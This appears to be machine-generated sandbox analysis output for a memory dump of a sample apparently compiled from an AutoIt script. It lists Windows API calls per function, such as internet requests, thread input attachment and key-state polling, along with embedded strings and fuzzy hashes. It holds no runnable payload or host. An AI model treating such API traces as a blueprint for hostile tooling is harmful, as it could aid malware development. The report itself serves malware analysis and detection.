                                                                • Opcode Fuzzy Hash: 562b6d4b6aba06a7147fa4c05cd4b1a056142e7f9b8d05a8403390e0b6e74c38
                                                                • Instruction Fuzzy Hash: 8E918F75614201EFDB20CF19E488F16BBE0AF84328F1585A9E4698B6A2C738EC41CFD1
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$BuffCharLower
                                                                • String ID: cdecl$none$stdcall$winapi
                                                                • API String ID: 707087890-567219261
                                                                • Opcode ID: b26d95b1406ff9adae0b60c5bfb1601feba799f053981d0f7e3d48299e3a11d3
                                                                • Instruction ID: 68b8f763237af72f3898132b6ccb41d26f01dd23ee748aa11ebd05fe0c4bbd78
                                                                • Opcode Fuzzy Hash: b26d95b1406ff9adae0b60c5bfb1601feba799f053981d0f7e3d48299e3a11d3
                                                                • Instruction Fuzzy Hash: 1B51C131A00116EBCF54DF6CD9519BEB3A5BF6A320B204229E526E73C4EB39ED40C791
                                                                APIs
                                                                • CoInitialize.OLE32 ref: 00793774
                                                                • CoUninitialize.OLE32 ref: 0079377F
                                                                • CoCreateInstance.OLE32(?,00000000,00000017,007AFB78,?), ref: 007937D9
                                                                • IIDFromString.OLE32(?,?), ref: 0079384C
                                                                • VariantInit.OLEAUT32(?), ref: 007938E4
                                                                • VariantClear.OLEAUT32(?), ref: 00793936
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                • API String ID: 636576611-1287834457
                                                                • Opcode ID: 1bc51be3fdb8f964dcaaa18552aadd8a58a65c20271358b01975bb9818285fa1
                                                                • Instruction ID: 8449756ee865153a3acd7457757dd13fa9854e49ea10fd2cb126d6ae603342a5
                                                                • Opcode Fuzzy Hash: 1bc51be3fdb8f964dcaaa18552aadd8a58a65c20271358b01975bb9818285fa1
                                                                • Instruction Fuzzy Hash: D7618FB0608301EFDB11DF54D889F6ABBE4EF49714F004909F5859B291D778EE48CBA6
                                                                APIs
                                                                  • Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2
                                                                  • Part of subcall function 0072912D: GetCursorPos.USER32(?), ref: 00729141
                                                                  • Part of subcall function 0072912D: ScreenToClient.USER32(00000000,?), ref: 0072915E
                                                                  • Part of subcall function 0072912D: GetAsyncKeyState.USER32(00000001), ref: 00729183
                                                                  • Part of subcall function 0072912D: GetAsyncKeyState.USER32(00000002), ref: 0072919D
                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 007A8B6B
                                                                • ImageList_EndDrag.COMCTL32 ref: 007A8B71
                                                                • ReleaseCapture.USER32 ref: 007A8B77
                                                                • SetWindowTextW.USER32(?,00000000), ref: 007A8C12
                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007A8C25
                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 007A8CFF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#~
                                                                • API String ID: 1924731296-3409604630
                                                                • Opcode ID: 8255ba0aaf7c231f97c13b8aac4d37a3812434eb68fd9cbce53fb4bb455993db
                                                                • Instruction ID: ed1551fdfae6f596526a212bd0d8db7b5f21afde6841b8e8d1def75c97cb6759
                                                                • Opcode Fuzzy Hash: 8255ba0aaf7c231f97c13b8aac4d37a3812434eb68fd9cbce53fb4bb455993db
                                                                • Instruction Fuzzy Hash: 8E519B71105340EFD704DF24DC9AFAA77E4FB89710F400669F992572E2DB78AA44CB62
                                                                APIs
                                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007833CF
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007833F0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: LoadString$_wcslen
                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                • API String ID: 4099089115-3080491070
                                                                • Opcode ID: ef6ffc1a3a1f288eda3197cd8ea4a66574c874287eafcc9e767970e98d3def38
                                                                • Instruction ID: dcb822214164a15fb6e55ac32d2eeeb22b5a04948406def78c38482f842510f5
                                                                • Opcode Fuzzy Hash: ef6ffc1a3a1f288eda3197cd8ea4a66574c874287eafcc9e767970e98d3def38
                                                                • Instruction Fuzzy Hash: 0151A1B1801209FADF15EBA4CD5AEEEB778AF04740F108065F50972191EB3D2F98DB60
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$BuffCharUpper
                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                • API String ID: 1256254125-769500911
                                                                • Opcode ID: fdf75f613284c4c4ebdc7cc58e3938fb600a7d2313240745d94afb35de0f9226
                                                                • Instruction ID: 0234136423d9755658c416cb3a812a16d69a0f2f1585bf5f15205fbe7df9d44d
                                                                • Opcode Fuzzy Hash: fdf75f613284c4c4ebdc7cc58e3938fb600a7d2313240745d94afb35de0f9226
                                                                • Instruction Fuzzy Hash: E641DB32A00126DBCF105F7DC8906BE77B5AFA17E4B24812AE629D7284E73DDD81C790
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 007853A0
                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00785416
                                                                • GetLastError.KERNEL32 ref: 00785420
                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 007854A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                • API String ID: 4194297153-14809454
                                                                • Opcode ID: 06a6bbcbf2ee43283ec7805604b052b28a087f430dec391e557d3db823d77cff
                                                                • Instruction ID: 5b47cbfa90dfdfe6d3ba97940a1ad761a30be29dc75deea0d3c9f9ac0b2d7c4e
                                                                • Opcode Fuzzy Hash: 06a6bbcbf2ee43283ec7805604b052b28a087f430dec391e557d3db823d77cff
                                                                • Instruction Fuzzy Hash: 8E31C375A40644EFDB10EF68C488AAABBF4FF45305F148065E509CB392DB79DD86CB90
                                                                APIs
                                                                • CreateMenu.USER32 ref: 007A3C79
                                                                • SetMenu.USER32(?,00000000), ref: 007A3C88
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A3D10
                                                                • IsMenu.USER32(?), ref: 007A3D24
                                                                • CreatePopupMenu.USER32 ref: 007A3D2E
                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007A3D5B
                                                                • DrawMenuBar.USER32 ref: 007A3D63
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                • String ID: 0$F
                                                                • API String ID: 161812096-3044882817
                                                                • Opcode ID: 2c3cf050c0897e2bee7e8e8cde114fa81defd51c1498f9994f559ceadbc08ffe
                                                                • Instruction ID: cb37d3cb225638b8564d07d2185cab250dc1e193453b521516427f702c21a6c0
                                                                • Opcode Fuzzy Hash: 2c3cf050c0897e2bee7e8e8cde114fa81defd51c1498f9994f559ceadbc08ffe
                                                                • Instruction Fuzzy Hash: 10416B75A01209EFDB14CF64D884EEA7BB5FF8A351F144129F946A7360D738AA10CF94
                                                                APIs
                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007A3A9D
                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007A3AA0
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 007A3AC7
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007A3AEA
                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007A3B62
                                                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 007A3BAC
                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 007A3BC7
                                                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 007A3BE2
                                                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 007A3BF6
                                                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 007A3C13
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$LongWindow
                                                                • String ID:
                                                                • API String ID: 312131281-0
                                                                • Opcode ID: 8878165e2fbb03f15021f7bedb0ed621ad4a0b4a3b100f133a51872119bba73d
                                                                • Instruction ID: f5977a6a3632517722006a40c6ef30ed1361ad8613f2146a7ef80ae23c68d3da
                                                                • Opcode Fuzzy Hash: 8878165e2fbb03f15021f7bedb0ed621ad4a0b4a3b100f133a51872119bba73d
                                                                • Instruction Fuzzy Hash: 09618E75900248EFDB10DF68CC81EEE77F8EB49710F104199FA15AB291C778AE41DB60
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 0077B151
                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0077A1E1,?,00000001), ref: 0077B165
                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0077B16C
                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0077A1E1,?,00000001), ref: 0077B17B
                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0077B18D
                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0077A1E1,?,00000001), ref: 0077B1A6
                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0077A1E1,?,00000001), ref: 0077B1B8
                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0077A1E1,?,00000001), ref: 0077B1FD
                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0077A1E1,?,00000001), ref: 0077B212
                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0077A1E1,?,00000001), ref: 0077B21D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                • String ID:
                                                                • API String ID: 2156557900-0
                                                                • Opcode ID: 2ba24b83eae2e55d404b625ca3df072aa898b403cfb74af5beb41f99899044cf
                                                                • Instruction ID: 9e553bdb81490b2954950294fbf33e7f4b49b7653afcbdd327f3dc05a9c1e26d
                                                                • Opcode Fuzzy Hash: 2ba24b83eae2e55d404b625ca3df072aa898b403cfb74af5beb41f99899044cf
                                                                • Instruction Fuzzy Hash: D831BD71501208BFDF119F24DC89B6D7BAABB96395F10C804FA08DB191D7BC9E008F68
                                                                APIs
                                                                • _free.LIBCMT ref: 00742C94
                                                                  • Part of subcall function 007429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000), ref: 007429DE
                                                                  • Part of subcall function 007429C8: GetLastError.KERNEL32(00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000,00000000), ref: 007429F0
                                                                • _free.LIBCMT ref: 00742CA0
                                                                • _free.LIBCMT ref: 00742CAB
                                                                • _free.LIBCMT ref: 00742CB6
                                                                • _free.LIBCMT ref: 00742CC1
                                                                • _free.LIBCMT ref: 00742CCC
                                                                • _free.LIBCMT ref: 00742CD7
                                                                • _free.LIBCMT ref: 00742CE2
                                                                • _free.LIBCMT ref: 00742CED
                                                                • _free.LIBCMT ref: 00742CFB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: ce7b3cc3c49480840254e3318bbd9c4c20df97c8dca47403a806ebe281e5e7f3
                                                                • Instruction ID: b6a43f5aa0e407b4ce2e8f7a30c21fcd7a924bc9f2c1cbcabb2f7372238f5c79
                                                                • Opcode Fuzzy Hash: ce7b3cc3c49480840254e3318bbd9c4c20df97c8dca47403a806ebe281e5e7f3
                                                                • Instruction Fuzzy Hash: A9118076100108EFDB02EF55D886CDD3BA5FF05350F9144A5FA48AB232DB35EA619F90
                                                                APIs
                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00711459
                                                                • OleUninitialize.OLE32(?,00000000), ref: 007114F8
                                                                • UnregisterHotKey.USER32(?), ref: 007116DD
                                                                • DestroyWindow.USER32(?), ref: 007524B9
                                                                • FreeLibrary.KERNEL32(?), ref: 0075251E
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0075254B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                • String ID: close all
                                                                • API String ID: 469580280-3243417748
                                                                • Opcode ID: f366081f275ce6735d29d8c43941ec1709d2f1ab6849a7f2b504227d73928936
                                                                • Instruction ID: 540d7b52b1be858296832f5b41640ae98a657845887050055c73fbdd30021dd6
                                                                • Opcode Fuzzy Hash: f366081f275ce6735d29d8c43941ec1709d2f1ab6849a7f2b504227d73928936
                                                                • Instruction Fuzzy Hash: E9D1A131701212DFCB19EF18C499AA9F7A0BF06701F5441ADE94A6B292DB39EC67CF50
                                                                APIs
                                                                • SetWindowLongW.USER32(?,000000EB), ref: 00715C7A
                                                                  • Part of subcall function 00715D0A: GetClientRect.USER32(?,?), ref: 00715D30
                                                                  • Part of subcall function 00715D0A: GetWindowRect.USER32(?,?), ref: 00715D71
                                                                  • Part of subcall function 00715D0A: ScreenToClient.USER32(?,?), ref: 00715D99
                                                                • GetDC.USER32 ref: 007546F5
                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00754708
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00754716
                                                                • SelectObject.GDI32(00000000,00000000), ref: 0075472B
                                                                • ReleaseDC.USER32(?,00000000), ref: 00754733
                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007547C4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                • String ID: U
                                                                • API String ID: 4009187628-3372436214
                                                                • Opcode ID: fcd3a5e2b7d0551d9b00312002bb0f5bffd60130e38d076e23e53121d4f2a90d
                                                                • Instruction ID: b882137ff5d1dda9f164b1d720a07bfd4376c252d2416993c6b014c04b0d60b7
                                                                • Opcode Fuzzy Hash: fcd3a5e2b7d0551d9b00312002bb0f5bffd60130e38d076e23e53121d4f2a90d
                                                                • Instruction Fuzzy Hash: 0E711330400205EFCF258F68C984AFA3BB1FF8A31AF144669ED515A1A6C7799CC5DF60
                                                                APIs
                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007835E4
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                • LoadStringW.USER32(007E2390,?,00000FFF,?), ref: 0078360A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: LoadString$_wcslen
                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                • API String ID: 4099089115-2391861430
                                                                • Opcode ID: ffafd1a924ce77b896d6c8f526246ca8acdedb1dda39b3adc1740d1b69eeba8d
                                                                • Instruction ID: 0221c687b5867931140c44528a02a70f4ca45806f5d2dceb61dfae1914f56991
                                                                • Opcode Fuzzy Hash: ffafd1a924ce77b896d6c8f526246ca8acdedb1dda39b3adc1740d1b69eeba8d
                                                                • Instruction Fuzzy Hash: E55191B1800209FADF15EBA4CC96EEDBB34AF04740F144125F615721A1EB386BD9DFA4
                                                                APIs
                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0078C272
                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0078C29A
                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0078C2CA
                                                                • GetLastError.KERNEL32 ref: 0078C322
                                                                • SetEvent.KERNEL32(?), ref: 0078C336
                                                                • InternetCloseHandle.WININET(00000000), ref: 0078C341
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                • String ID:
                                                                • API String ID: 3113390036-3916222277
                                                                • Opcode ID: 991ef556da168dd44b2c96aa79d6283a2c6b37a78535445d44b090f8b3dc9d8c
                                                                • Instruction ID: 9ed4e96060f9088913b8be0951e92af6d8bb65d55b717a1173c7acf9571b0d9f
                                                                • Opcode Fuzzy Hash: 991ef556da168dd44b2c96aa79d6283a2c6b37a78535445d44b090f8b3dc9d8c
                                                                • Instruction Fuzzy Hash: D8319CB1640208BFD723AFA49C88AAB7BFCEB4A744F14851EF446D2640DB38DD058B71
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00753AAF,?,?,Bad directive syntax error,007ACC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 007798BC
                                                                • LoadStringW.USER32(00000000,?,00753AAF,?), ref: 007798C3
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00779987
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: HandleLoadMessageModuleString_wcslen
                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
